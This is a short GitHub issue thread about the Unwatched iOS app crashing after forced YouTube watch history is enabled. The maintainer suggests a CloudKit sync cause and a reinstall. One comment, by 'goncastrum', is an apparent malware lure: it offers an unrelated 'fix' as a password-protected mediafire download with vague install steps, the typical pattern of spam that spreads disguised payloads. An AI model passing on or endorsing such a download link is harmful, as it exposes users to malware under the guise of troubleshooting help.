### ISSUE TITLE
Force YouTube watch history causing crashes 

### ISSUE THREAD

**Issue by yehoni** [fer0n/Unwatched#6]
I just updated to 1.1.0, enabled force YouTube watch history, and the app immediately crashed. Now it crashes immediately every time I try to launch it.

iOS 17.6.1 on an iPhone 15 Pro.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by fer0n** [comment]
Do you have iCloud sync enabled? I've had this happen when I reset the CloudKit dev environment and someone else reported the same. Perhaps it was just an coincidence that it started after turning on watch history.

You will probably have to delete the app, reinstall it and restore from backup, sorry.
